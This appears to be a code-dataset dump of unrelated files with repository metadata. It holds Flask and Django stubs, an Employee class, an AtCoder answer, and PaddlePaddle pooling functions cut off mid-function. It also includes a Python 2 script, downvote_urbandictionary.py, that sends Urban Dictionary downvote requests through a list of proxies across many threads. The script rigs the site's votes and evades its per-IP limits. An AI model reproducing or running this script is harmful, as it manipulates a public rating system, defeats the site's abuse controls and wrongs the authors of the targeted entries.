02ac9899aebea4475614969b594bfe2992ffe29a
|
548f6cb5038e927b54adca29caf02c981fdcecfc
|
refs/heads/master
| 2021-01-25T14:45:42.120220
| 2018-08-11T23:45:31
| 2018-08-11T23:45:31
| 117,135,069
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
#!/usr/bin/env python3
from flask import Blueprint, Flask, render_template, request, url_for
controller = Blueprint('tidy', __name__, url_prefix='/tidy')
# @controller.route('/<string:title>', methods=['GET'])
# def lookup(title):
# if title == 'Republic': # TODO 2
# return render_template('republic.html') # TODO 2
# else:
# pass
|
[
"sqlconsult@hotmail.com"
] |
sqlconsult@hotmail.com
|
864e0d13bb575384b5cef4c8125abecb6c3dc9f4
|
96f3c029e79f3997b97b30912b45886790a155bc
|
/chapter-10/employee_class.py
|
3b8ae81217016774122ef9fe2dcc0d654522d699
|
[] |
no_license
|
Techwrekfix/Starting-out-with-python
|
ba32dff77a3360d004fa82a6dc4b62b1648022af
|
6adb490daf5085f08e08c9eb847c84cfce89330e
|
refs/heads/master
| 2020-06-02T18:52:32.064755
| 2018-12-20T16:10:33
| 2018-12-20T16:10:33
| 191,272,861
| 1
| 0
| null | 2019-06-11T01:43:38
| 2019-06-11T01:43:38
| null |
UTF-8
|
Python
| false
| false
| 1,074
|
py
|
#This module is an Employee class
class Employee:
#Initializing the data attributes
def __init__(self,name,ID_number,department,job_title):
self.__name = name
self.__ID_number = ID_number
self.__department = department
self.__job_title = job_title
def set_name(self,name):
self.__name = name
def set_ID_number(self,ID_number):
self.__ID_number = ID_number
def set_department(self,department):
self.__department = department
def set_job_title(self,job_title):
self.__job_title = job_title
def get_name(self):
return self.__name
def get_ID_number(self):
return self.__ID_number
def get_department(self):
return self.__department
def get_job_title(self):
return self.__job_title
def __str__(self):
return 'Name: ' + self.__name +\
'\nID_Number: ' + self.__ID_number +\
'\nDepartment: ' + self.__department +\
'\nJob Title: ' + self.__job_title
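
# Example usage (added for illustration; not part of the original module):
if __name__ == '__main__':
    emp = Employee('Ada Lovelace', '1001', 'Engineering', 'Analyst')
    emp.set_job_title('Senior Analyst')
    print(emp)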
|
[
"kwabena4140@gmail.com"
] |
kwabena4140@gmail.com
|
f464f5c4280a093bbe8deed632c851d2ba4a6c53
|
392870585863452cd9c5e5bcddc0866193b7e67b
|
/getapp/admin.py
|
84b57793f16fb0a06daffccf26dd7738b446c375
|
[] |
no_license
|
Adelice/Get-It
|
684c097ff6895829e6d4b2e1b69c7ea9f3454b0c
|
ddc4f9739814e5a3951f8361a5550251e9c0c9ff
|
refs/heads/master
| 2020-05-17T02:02:24.266686
| 2019-05-02T15:14:51
| 2019-05-02T15:14:51
| 183,243,765
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 199
|
py
|
from django.contrib import admin
from .models import Store,Product
# admin.site.register(Product, ProductAdmin)
admin.site.register(Store)
admin.site.register(Product)
# Register your models here.
|
[
"nancytoniw@gmail.com"
] |
nancytoniw@gmail.com
|
9d3c56c8feb382a952c59f61e914adf8e7b237d3
|
4c976067eea83d1b1afb1b17b5308955c5b92256
|
/colleges/migrations/0006_auto_20201126_2259.py
|
573bc17246409a697cc8c5e45a3a1d01ade9622b
|
[] |
no_license
|
rafiqnazir/ecopy4u
|
556bda8c01c52cf101f7d776859228ff7769f5de
|
4d9ed43bd977491e6adabb2b1afe657f12dbeb01
|
refs/heads/main
| 2023-03-08T10:53:42.716120
| 2021-02-23T10:22:25
| 2021-02-23T10:22:25
| 318,174,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
# Generated by Django 3.1.3 on 2020-11-26 17:29
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('colleges', '0005_auto_20201126_2258'),
]
operations = [
migrations.AlterUniqueTogether(
name='colleges',
unique_together={('college_name', 'branch', 'subject', 'session')},
),
]
|
[
"nademnazir79@gmail.com"
] |
nademnazir79@gmail.com
|
ccd2b55fa52d1a6ae8d1e675060a901dac050266
|
5a7987a0741db037785bc297c699f2904dc4d556
|
/tests/run_setup.py
|
9ed530d55f390ee334e8828a892ff2361629749f
|
[] |
no_license
|
cjoyneruk/pyfpl
|
581778fbd1eeb3ea2cd28689d679dcd92e0e0071
|
e9c2e042b8ecf6bf37e3aeaddaccf98a493c7e59
|
refs/heads/master
| 2020-07-16T01:29:53.769187
| 2019-09-23T20:48:56
| 2019-09-23T20:48:56
| 205,691,839
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 32
|
py
|
from pyfpl import setup
setup()
|
[
"c.joyner@qmul.ac.uk"
] |
c.joyner@qmul.ac.uk
|
1d940d2cf808a4a5ee8f504ad054bf07686480c0
|
cfa474b083d308b0eff611163bce93919ec362c3
|
/downvote_urbandictionary.py
|
58ac4c7fc54db51fd067c111f2d90e688c1e5759
|
[] |
no_license
|
bubakazouba/urbandictionarydownvote
|
ad06715f7c451fa4af2d48e43d39d1229b1dc783
|
a929b6ca6aac612e56b4d12eef57f81b074e40e4
|
refs/heads/master
| 2021-01-23T16:04:54.336101
| 2017-06-04T00:44:29
| 2017-06-04T00:44:29
| 93,281,672
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,497
|
py
|
import requests, sys, threading, argparse, json
def read_list_from_file(fname):
with open(fname) as f:
content = f.readlines()
return [x.strip() for x in content]
def downvote_url_with_list(url, proxy_list, len_of_all_proxy_list, thread_number):
global proxies_failed, proxies_succeeded, now_down, first_down
for proxy in proxy_list:
proxies_failed += 1
proxies = {'http': proxy}
try:
a = json.loads(requests.get(url,proxies=proxies,timeout=5).text)
try:
proxies_succeeded += 1 if a["status"] == "saved" else 0
now_down = a["down"]
if first_down == None: first_down = now_down
except Exception as e: pass
except Exception as e: pass
if None not in [first_down, now_down]:
print '%d: %d/%d/%d. Down: %d-->%d' % (thread_number, proxies_succeeded, proxies_failed, len_of_all_proxy_list, first_down, now_down)
sys.stdout.flush()
parser = argparse.ArgumentParser(description='Test proxies')
parser.add_argument('-f', '--proxylist-filename', dest='proxy_fname', action='store', help='file containing proxy list')
parser.add_argument('-x', '--urls-filename', dest='urls_fname', action='store', help='file containing urls')
parser.add_argument('-N', '--number-of-threads', dest='N', action='store', help='number of threads')
args = parser.parse_args()
urls_fname = args.urls_fname
proxy_fname = args.proxy_fname
N = int(args.N)
if None in [urls_fname,proxy_fname]:
print 'you have to enter proxy filename (-f) and urls filename (-x) and number of threads (-N)'
exit()
proxy_list = read_list_from_file(proxy_fname)
urls_list = read_list_from_file(urls_fname)
L = len(proxy_list)
print urls_list
for url in urls_list:
proxies_failed = proxies_succeeded = 0
first_down = now_down = None
print url
print 'success-failure/total. Down: started_with-->now_at'
i = 0
thread_number = 0
threads = []
while i <= L:
sub_proxy_list = proxy_list[i:i+L/N]
i += L/N
thread_number += 1
threads.append(threading.Thread(target=downvote_url_with_list, args=[url, sub_proxy_list, L, thread_number]))
threads[-1].start()
print 'going to join nowwww'
for thread in threads:
print 'trying to join...'
thread.join()
print 'joined!!!!!!!!!!'
print '--------------- done with url: '+url
# join all threads before going to next url
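
# Example invocation (added for illustration; the file names are placeholders):
#   python downvote_urbandictionary.py -f proxies.txt -x urls.txt -N 10
# proxies.txt holds one "host:port" HTTP proxy per line, urls.txt holds one
# vote URL per line, and -N sets how many threads split the proxy list.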
|
[
"ahsahmoud@ucdavis.edu"
] |
ahsahmoud@ucdavis.edu
|
b83d7540a601a21c01a3242898b9d7a2394f6490
|
209a375fb65d38464fc67281643615a7a4f2012b
|
/abc159/c.py
|
f7e8cb5b361f8e772f1ab2bf2d5eebee81055fc9
|
[] |
no_license
|
satoshun-algorithm-example/atcoder
|
707804c855768496676dc4711586d517945646d3
|
81e898f38d1e2db3200882dc34180c407a86de12
|
refs/heads/master
| 2021-06-21T23:18:32.532374
| 2020-11-23T09:05:19
| 2020-11-23T09:05:19
| 154,495,507
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 97
|
py
|
# https://atcoder.jp/contests/abc159/tasks/abc159_c
L = int(input())
a = L / 3
print(a * a * a)
|
[
"shun.sato1@gmail.com"
] |
shun.sato1@gmail.com
|
465197ced44448fbd1f5072861ff9b7c86cf9093
|
43e0cfda9c2ac5be1123f50723a79da1dd56195f
|
/python/paddle/nn/functional/pooling.py
|
766a1ca3aaf64024c179f8a5d38a263e550f5c5a
|
[
"Apache-2.0"
] |
permissive
|
jiangjiajun/Paddle
|
837f5a36e868a3c21006f5f7bb824055edae671f
|
9b35f03572867bbca056da93698f36035106c1f3
|
refs/heads/develop
| 2022-08-23T11:12:04.503753
| 2022-08-11T14:40:07
| 2022-08-11T14:40:07
| 426,936,577
| 0
| 0
|
Apache-2.0
| 2022-02-17T03:43:19
| 2021-11-11T09:09:28
|
Python
|
UTF-8
|
Python
| false
| false
| 84,464
|
py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO: define pooling functions
from ...fluid.layers import utils, LayerHelper
from ...tensor.manipulation import unsqueeze, squeeze
from ...fluid.data_feeder import check_type, check_variable_and_dtype
from paddle import _C_ops
from paddle import in_dynamic_mode
from paddle.fluid.framework import _in_legacy_dygraph
from paddle.fluid.framework import in_dygraph_mode
__all__ = []
def _is_list_or_tuple(input):
return isinstance(input, (list, tuple))
def _check_input(x, dimension):
if len(x.shape) != dimension:
raise ValueError(
"Excepted Input X is {}-D tensor, but received {}-D {}".format(
dimension, len(x.shape), type(x)))
def _check_instance(x, x_name, types=(int, float)):
if not isinstance(x, types):
raise ValueError(
"Excepted {} type for {} but received type: {}. ".format(
types, x_name, type(x)))
def _check_value_limitation(x, x_name, min_limit=1e-3):
def _check_value(x, x_name, min_limit=1e-3):
if isinstance(x, int) and min_limit is not None and x < min_limit:
raise ValueError(
"Excepted the input {} to be greater than {} but received x: {}. "
.format(x_name, min_limit, x))
for ele in x:
_check_value(ele, x_name)
def _zero_padding_in_batch_and_channel(padding, channel_last):
if channel_last:
return list(padding[0]) == [0, 0] and list(padding[-1]) == [0, 0]
else:
return list(padding[0]) == [0, 0] and list(padding[1]) == [0, 0]
def _exclude_padding_in_batch_and_channel(padding, channel_last):
padding_ = padding[1:-1] if channel_last else padding[2:]
padding_ = [elem for pad_a_dim in padding_ for elem in pad_a_dim]
return padding_
def _channel_last(data_format, num_dims):
if num_dims == 1:
if data_format not in ['NCL', 'NLC']:
raise ValueError(
"Attr(data_format) should be 'NCL' or 'NLC'. Received "
"Attr(data_format): %s" % str(data_format))
else:
return True if data_format == "NLC" else False
if num_dims == 2:
if data_format not in ['NCHW', 'NHWC']:
raise ValueError(
"Attr(data_format) should be 'NCHW' or 'NHWC'. Received "
"Attr(data_format): %s" % str(data_format))
else:
return True if data_format == "NHWC" else False
if num_dims == 3:
if data_format not in ['NCDHW', 'NDHWC']:
raise ValueError(
"Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received "
"Attr(data_format): %s" % str(data_format))
else:
return True if data_format == "NDHWC" else False
def _update_padding_nd(padding, num_dims, channel_last=False, ceil_mode=False):
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '{}'. It can only be 'SAME' or 'VALID'.".
format(padding))
if padding == "VALID":
if ceil_mode != False:
raise ValueError(
"When Attr(padding) is \"VALID\", Attr(ceil_mode) must be False. "
"Received ceil_mode: True.")
padding_algorithm = "VALID"
padding = [0] * num_dims
else:
padding_algorithm = "SAME"
padding = [0] * num_dims
elif _is_list_or_tuple(padding):
# for padding like
# [(pad_before, pad_after), (pad_before, pad_after), ...]
# padding for batch_dim and channel_dim included
if len(padding) == 2 + num_dims and _is_list_or_tuple(padding[0]):
if not _zero_padding_in_batch_and_channel(padding, channel_last):
raise ValueError(
"Non-zero padding({}) in the batch or channel dimensions "
"is not supported.".format(padding))
padding_algorithm = "EXPLICIT"
padding = _exclude_padding_in_batch_and_channel(
padding, channel_last)
if utils._is_symmetric_padding(padding, num_dims):
padding = padding[0::2]
# for padding like [pad_before, pad_after, pad_before, pad_after, ...]
elif len(padding) == 2 * num_dims and isinstance(padding[0], int):
padding_algorithm = "EXPLICIT"
padding = utils.convert_to_list(padding, 2 * num_dims, 'padding')
if utils._is_symmetric_padding(padding, num_dims):
padding = padding[0::2]
# for padding like [pad_d1, pad_d2, ...]
elif len(padding) == num_dims and isinstance(padding[0], int):
padding_algorithm = "EXPLICIT"
padding = utils.convert_to_list(padding, num_dims, 'padding')
else:
raise ValueError("Invalid padding: {}".format(padding))
# for integer padding
else:
padding_algorithm = "EXPLICIT"
padding = utils.convert_to_list(padding, num_dims, 'padding')
return padding, padding_algorithm
def _expand_low_nd_padding(padding):
#1d to 2d fake input
if len(padding) == 2:
padding = [0] * 2 + padding
elif len(padding) == 1:
padding = [0] + padding
else:
raise ValueError(
"The size of padding's dimmention should be 1 or 2. But got padding={}"
.format(padding))
return padding
def avg_pool1d(x,
kernel_size,
stride=None,
padding=0,
exclusive=True,
ceil_mode=False,
name=None):
"""
This API implements average pooling 1d operation,
See more details in :ref:`api_nn_pooling_AvgPool1d` .
Args:
x (Tensor): The input tensor of pooling operator which is a 3-D tensor with
shape [N, C, L]. where `N` is batch size, `C` is the number of channels,
`L` is the length of the feature. The data type is float32 or float64.
kernel_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain an integer.
stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
it must contain an integer.
padding (string|int|list|tuple): The padding size. Padding could be in one of the following forms.
1. A string in ['valid', 'same'].
2. An int, which means the feature map is zero padded by size of `padding` on every sides.
3. A list[int] or tuple(int) whose length is 1, which means the feature map is zero padded by the size of `padding[0]` on every sides.
4. A list[int] or tuple(int) whose length is 2. It has the form [pad_before, pad_after].
5. A list or tuple of pairs of integers. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension should be [0,0] or (0,0).
The default value is 0.
exclusive (bool): Whether to exclude padding points in average pooling
mode, default is `True`.
        ceil_mode (bool): Whether to use the ceil function to calculate output height and width.
If it is set to False, the floor function will be used. The default value is False.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is "VALID", but `ceil_mode` is True.
ValueError: If `padding` is a list or tuple but its length is greater than 1.
ShapeError: If the input is not a 3-D tensor.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
data = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32]).astype(np.float32))
out = F.avg_pool1d(data, kernel_size=2, stride=2, padding=0)
# out shape: [1, 3, 16]
"""
"""NCL to NCHW"""
data_format = "NCHW"
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'avg_pool1d')
_check_input(x, 3)
x = unsqueeze(x, [2])
kernel_size = utils.convert_to_list(kernel_size, 1, 'kernel_size')
kernel_size = [1] + kernel_size
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 1, 'pool_stride')
stride = [1] + stride
_check_value_limitation(kernel_size, "kernel_size", min_limit=1e-3)
_check_value_limitation(stride, "stride", min_limit=1e-3)
channel_last = _channel_last("NCL", 1)
padding, padding_algorithm = _update_padding_nd(padding,
1,
channel_last=channel_last,
ceil_mode=ceil_mode)
    # uses 2d pooling to implement 1d, so the padding should be expanded in advance.
padding = _expand_low_nd_padding(padding)
if in_dynamic_mode():
output = _C_ops.pool2d(x, 'pooling_type', 'avg', 'ksize', kernel_size,
'global_pooling', False, 'strides', stride,
'paddings', padding, 'padding_algorithm',
padding_algorithm, 'use_cudnn', True,
'ceil_mode', ceil_mode, 'use_mkldnn', False,
'exclusive', exclusive, 'data_format',
data_format)
return squeeze(output, [2])
op_type = 'pool2d'
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type=op_type,
inputs={"X": x},
outputs={"Out": pool_out},
attrs={
"pooling_type": 'avg',
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": exclusive,
"data_format": data_format,
})
return squeeze(pool_out, [2])
def avg_pool2d(x,
kernel_size,
stride=None,
padding=0,
ceil_mode=False,
exclusive=True,
divisor_override=None,
data_format="NCHW",
name=None):
"""
This API implements average pooling 2d operation.
See more details in :ref:`api_nn_pooling_AvgPool2d` .
Args:
x (Tensor): The input tensor of pooling operator which is a 4-D tensor with
shape [N, C, H, W]. The format of input tensor is `"NCHW"` or
`"NHWC"`, where `N` is batch size, `C` is the number of channels,
`H` is the height of the feature, and `W` is the width of the
            feature. The data type is float32 or float64.
kernel_size (int|list|tuple): The pool kernel size. If it is a tuple or list,
it must contain two integers, (kernel_size_Height, kernel_size_Width).
Otherwise, the pool kernel size will be a square of an int.
stride (int|list|tuple): The stride size. If it is a tuple or list,
it must contain two integers, (stride_Height, stride_Width).
Otherwise, the stride size will be a square of an int.
padding (string|int|list|tuple): The padding size. Padding could be in one of the following forms.
1. A string in ['valid', 'same'].
2. An int, which means the feature map is zero padded by size of `padding` on every sides.
            3. A list[int] or tuple(int) whose length is 2, [pad_height, pad_width] whose value means the padding size of each dimension.
4. A list[int] or tuple(int) whose length is 4. [pad_height_top, pad_height_bottom, pad_width_left, pad_width_right] whose value means the padding size of each side.
5. A list or tuple of pairs of integers. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension should be [0,0] or (0,0).
The default value is 0.
ceil_mode (bool): when True, will use `ceil` instead of `floor` to compute the output shape
exclusive (bool): Whether to exclude padding points in average pooling
mode, default is `true`.
divisor_override (float): if specified, it will be used as divisor, otherwise kernel_size will be used. Default None.
data_format (string): The data format of the input and output data. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is "VALID", but `ceil_mode` is True.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
# avg pool2d
x = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32, 32]).astype(np.float32))
out = F.avg_pool2d(x,
kernel_size=2,
stride=2, padding=0)
# out.shape [1, 3, 16, 16]
"""
kernel_size = utils.convert_to_list(kernel_size, 2, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 2, 'pool_stride')
_check_value_limitation(kernel_size, "kernel_size", min_limit=1e-3)
_check_value_limitation(stride, "stride", min_limit=1e-3)
channel_last = _channel_last(data_format, 2)
padding, padding_algorithm = _update_padding_nd(padding,
2,
channel_last,
ceil_mode=ceil_mode)
if in_dygraph_mode() or _in_legacy_dygraph():
if in_dygraph_mode():
output = _C_ops.final_state_pool2d(x, kernel_size, stride, padding,
ceil_mode, exclusive,
data_format, 'avg', False, False,
padding_algorithm)
else:
output = _C_ops.pool2d(x, 'pooling_type', 'avg', 'ksize',
kernel_size, 'global_pooling', False,
'padding_algorithm', padding_algorithm,
'strides', stride, 'paddings', padding,
'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', exclusive,
'data_format', data_format)
if divisor_override is None:
return output
else:
_check_instance(divisor_override, "divisor_override")
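            # the pooled values were averaged over the kernel area, so rescale them to use the caller's divisor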
return output * (kernel_size[0] * kernel_size[1]) / divisor_override
op_type = 'pool2d'
helper = LayerHelper(op_type, **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'avg_pool2d')
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type=op_type,
inputs={"X": x},
outputs={"Out": pool_out},
attrs={
"pooling_type": "avg",
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": exclusive,
"data_format": data_format,
})
if divisor_override is None:
return pool_out
else:
_check_instance(divisor_override, "divisor_override")
return pool_out * (kernel_size[0] * kernel_size[1]) / divisor_override
def avg_pool3d(x,
kernel_size,
stride=None,
padding=0,
ceil_mode=False,
exclusive=True,
divisor_override=None,
data_format="NCDHW",
name=None):
"""
This API implements average pooling 3d operation.
See more details in :ref:`api_nn_pooling_AvgPool3d` .
Args:
x (Tensor): The input tensor of pooling operator, which is a 5-D tensor with
shape [N, C, D, H, W], where `N` represents the batch size, `C` represents
the number of channels, `D`, `H` and `W` represent the depth, height and width of the feature respectively.
kernel_size (int|list|tuple): The pool kernel size. If pool kernel size
is a tuple or list, it must contain three integers,
(kernel_size_Depth, kernel_size_Height, kernel_size_Width).
Otherwise, the pool kernel size will be the cube of an int.
stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
            it must contain three integers, (stride_Depth, stride_Height, stride_Width).
Otherwise, the pool stride size will be a cube of an int.
padding (string|int|list|tuple): The padding size. Padding could be in one of the following forms.
1. A string in ['valid', 'same'].
            2. An int, which means the feature map is zero padded by size of `padding` on every side.
            3. A list[int] or tuple(int) whose length is 3, [pad_depth, pad_height, pad_width] whose value means the padding size of each dimension.
4. A list[int] or tuple(int) whose length is 6. [pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right] whose value means the padding size of each side.
5. A list or tuple of pairs of integers. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension should be [0,0] or (0,0).
The default value is 0.
ceil_mode (bool): ${ceil_mode_comment}
exclusive (bool): Whether to exclude padding points in average pooling
mode, default is True.
        divisor_override (int|float): if specified, it will be used as divisor, otherwise kernel_size will be used. Default None.
data_format (string): The data format of the input and output data. An optional string from: `"NCDHW"`, `"NDHWC"`.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is "VALID", but `ceil_mode` is True.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle
import numpy as np
x = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32, 32, 32]).astype(np.float32))
# avg pool3d
out = paddle.nn.functional.avg_pool3d(
x,
kernel_size = 2,
stride = 2,
padding=0)
# out.shape: [1, 3, 16, 16, 16]
"""
kernel_size = utils.convert_to_list(kernel_size, 3, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 3, 'pool_stride')
channel_last = _channel_last(data_format, 3)
padding, padding_algorithm = _update_padding_nd(padding,
3,
channel_last=channel_last,
ceil_mode=ceil_mode)
_check_value_limitation(kernel_size, "kernel_size", min_limit=1e-3)
_check_value_limitation(stride, "stride", min_limit=1e-3)
if in_dygraph_mode() or _in_legacy_dygraph():
if in_dygraph_mode():
output = _C_ops.final_state_pool3d(x, kernel_size, stride, padding,
ceil_mode, exclusive,
data_format, 'avg', False, False,
padding_algorithm)
if _in_legacy_dygraph():
output = _C_ops.pool3d(x, 'pooling_type', 'avg', 'ksize',
kernel_size, 'strides', stride, 'paddings',
padding, 'global_pooling', False,
'padding_algorithm', padding_algorithm,
'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', exclusive,
'data_format', data_format)
if divisor_override is None:
return output
else:
_check_instance(divisor_override, "divisor_override")
return output * (kernel_size[0] * kernel_size[1] *
kernel_size[2]) / divisor_override
op_type = "pool3d"
helper = LayerHelper(op_type, **locals())
    check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'avg_pool3d')
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
helper.append_op(type=op_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'avg',
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": exclusive,
"data_format": data_format,
})
if divisor_override is None:
return pool_out
else:
_check_instance(divisor_override, "divisor_override")
return pool_out * (kernel_size[0] * kernel_size[1] *
kernel_size[2]) / divisor_override
def max_pool1d(x,
kernel_size,
stride=None,
padding=0,
return_mask=False,
ceil_mode=False,
name=None):
"""
    This API implements max pooling 1d operation.
See more details in :ref:`api_nn_pooling_MaxPool1d` .
Args:
x (Tensor): The input tensor of pooling operator which is a 3-D tensor with
shape [N, C, L], where `N` is batch size, `C` is the number of channels,
            `L` is the length of the feature. The data type is float32 or float64.
kernel_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain an integer.
stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
it must contain an integer.
padding (string|int|list|tuple): The padding size. Padding could be in one of the following forms.
1. A string in ['valid', 'same'].
            2. An integer, which means the feature map is zero padded by size of `padding` on both sides.
            3. A list[int] or tuple(int) whose length is 1, which means the feature map is zero padded by the size of `padding[0]` on both sides.
4. A list[int] or tuple(int) whose length is 2. It has the form [pad_before, pad_after].
5. A list or tuple of pairs of integers. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension should be [0,0] or (0,0).
The default value is 0.
return_mask (bool): Whether return the max indices along with the outputs. default is `False`.
        ceil_mode (bool): Whether to use the ceil function to calculate output height and width.
            If it is set to False, the floor function will be used. Default False.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is "VALID", but `ceil_mode` is True.
ShapeError: If the input is not a 3-D tensor.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
data = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32]).astype(np.float32))
pool_out = F.max_pool1d(data, kernel_size=2, stride=2, padding=0)
# pool_out shape: [1, 3, 16]
pool_out, indices = F.max_pool1d(data, kernel_size=2, stride=2, padding=0, return_mask=True)
# pool_out shape: [1, 3, 16], indices shape: [1, 3, 16]
"""
"""NCL to NCHW"""
data_format = "NCHW"
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'max_pool1d')
_check_input(x, 3)
x = unsqueeze(x, [2])
kernel_size = [1] + utils.convert_to_list(kernel_size, 1, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = [1] + utils.convert_to_list(stride, 1, 'pool_stride')
padding, padding_algorithm = _update_padding_nd(padding,
1,
ceil_mode=ceil_mode)
    # use 2d to implement 1d: the padding must be expanded in advance.
padding = _expand_low_nd_padding(padding)
if in_dygraph_mode():
if return_mask:
pool_out = _C_ops.final_state_max_pool2d_with_index(
x, kernel_size, stride, padding, False, False)
return (squeeze(pool_out[0], [2]),
squeeze(pool_out[1], [2])) if return_mask else squeeze(
pool_out[0], [2])
else:
pool_out = _C_ops.final_state_pool2d(x, kernel_size, stride,
padding, ceil_mode, True,
data_format, 'max', False,
False, padding_algorithm)
return squeeze(pool_out, [2])
if _in_legacy_dygraph():
if return_mask:
pool_out = _C_ops.max_pool2d_with_index(
x, 'ksize', kernel_size, 'global_pooling', False, 'strides',
stride, 'paddings', padding, 'padding_algorithm',
padding_algorithm, 'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', True, 'data_format',
data_format)
return (squeeze(pool_out[0], [2]),
squeeze(pool_out[1], [2])) if return_mask else squeeze(
pool_out[0], [2])
else:
pool_out = _C_ops.pool2d(x, 'pooling_type', 'max', 'ksize',
kernel_size, 'global_pooling', False,
'padding_algorithm', padding_algorithm,
'strides', stride, 'paddings', padding,
'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', True,
'data_format', data_format)
return squeeze(pool_out, [2])
op_type = 'max_pool2d_with_index' if return_mask else "pool2d"
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference('int32')
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=op_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'max',
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": True,
"data_format": data_format,
})
